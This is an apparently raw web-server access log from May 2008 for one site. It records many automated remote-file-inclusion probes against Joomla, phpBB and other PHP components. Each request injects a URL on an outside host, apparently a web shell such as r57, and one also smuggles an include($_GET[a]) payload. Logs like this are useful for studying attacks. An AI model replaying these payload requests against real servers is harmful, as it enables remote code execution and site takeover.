77.244.44.10 - - [24/May/2008:09:39:24 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:39:25 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:09:39:58 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:09:39:59 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:09:39:59 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:40:27 -0700] "GET /logs/config.php?path_to_root=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:40:27 -0700] "GET /config.php?path_to_root=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:09:40:40 -0700] "GET /logs/scripts.log/index.php3?p=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:09:40:40 -0700] "GET /index.php3?p=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:09:40:40 -0700] "GET /logs/index.php3?p=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:40:47 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:40:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.54.123.192 - - [24/May/2008:09:42:21 -0700] "GET /logs//errors.php?error=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:09:43:01 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:09:43:01 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:43:31 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:43:45 -0700] "GET /logs/access_080223.log//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:43:48 -0700] "GET //index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:43:48 -0700] "GET /logs//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:43:50 -0700] "GET /logs/access_080223.log//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:43:51 -0700] "GET //index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:43:51 -0700] "GET /logs//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:44:08 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:44:15 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:44:17 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:44:20 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.54.123.192 - - [24/May/2008:09:44:21 -0700] "GET /logs//errors.php?error=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:44:34 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:44:49 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:44:49 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:09:45:26 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:09:45:32 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:09:45:37 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:09:45:38 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:09:45:38 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:45:39 -0700] "GET /logs/access_080215.log//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:45:40 -0700] "GET /logs/access_080215.log//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:09:46:57 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:09:46:57 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:09:46:58 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.61.23 - - [24/May/2008:09:47:34 -0700] "GET /logs/access_080327.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.82.99.126 - - [24/May/2008:09:47:58 -0700] "GET /logs/access.log/My_eGallery/index.php?basepath=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.112.193.46 - - [24/May/2008:09:48:48 -0700] "GET /logs//_theme/breadcrumb.php?rootBase=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [24/May/2008:09:48:48 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/May/2008:09:48:48 -0700] "GET //_theme/breadcrumb.php?rootBase=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:09:49:11 -0700] "GET /logs//common/db.php?commonpath=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:09:49:14 -0700] "GET //common/db.php?commonpath=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:09:49:22 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:09:49:54 -0700] "GET /logs/access.log//class/class.dashboard_cms.php?where_framework=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:09:49:54 -0700] "GET //class/class.dashboard_cms.php?where_framework=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:09:49:54 -0700] "GET /logs//class/class.dashboard_cms.php?where_framework=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:09:50:16 -0700] "GET /logs/access_080313.log//class/class.dashboard_cms.php?where_framework=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:09:50:18 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:09:50:19 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:09:50:19 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:09:50:20 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:09:50:21 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:09:51:39 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:51:39 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:51:39 -0700] "GET /config.php?path_to_root=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:51:39 -0700] "GET /logs/config.php?path_to_root=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:51:42 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:23 -0700] "GET /logs/access_080220.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:23 -0700] "GET //include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:23 -0700] "GET /logs//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:42 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:42 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:42 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:42 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:42 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:43 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:09:52:44 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:46 -0700] "GET /logs/access_080220.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:46 -0700] "GET //include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:52:47 -0700] "GET /logs//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.217.194 - - [24/May/2008:09:52:53 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [24/May/2008:09:52:53 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.251.172 - - [24/May/2008:09:54:20 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.34.224.134 - - [24/May/2008:09:54:34 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.34.224.134 - - [24/May/2008:09:54:35 -0700] "GET //includes/messages.inc.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:54:52 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:54:53 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:54:53 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:54:54 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
158.227.2.24 - - [24/May/2008:09:55:34 -0700] "GET /logs/access_080212.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.alazharacademy.ca//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
158.227.2.24 - - [24/May/2008:09:55:35 -0700] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.alazharacademy.ca//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.164.77 - - [24/May/2008:09:56:04 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xotaz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.164.77 - - [24/May/2008:09:56:05 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xotaz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:56:14 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:56:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:56:18 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [24/May/2008:09:56:42 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:56:59 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:56:59 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:57:00 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.216.2.12 - - [24/May/2008:09:57:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [24/May/2008:09:57:12 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [24/May/2008:09:57:12 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [24/May/2008:09:57:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [24/May/2008:09:57:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [24/May/2008:09:57:24 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 200 4140 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:57:27 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:57:28 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:57:31 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:09:58:02 -0700] "GET /logs/access.log/index1.php?=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:09:58:03 -0700] "GET /index1.php?=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:09:58:03 -0700] "GET /logs/index1.php?=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:58:36 -0700] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:09:59:21 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:09:59:27 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:09:59:27 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:09:59:28 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:09:59:29 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.51.194 - - [24/May/2008:09:59:34 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [24/May/2008:09:59:34 -0700] "GET //includes/messages.inc.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:09:59:53 -0700] "GET /logs/access_080103.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:00:00 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:00:03 -0700] "GET /logs/access_080103.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
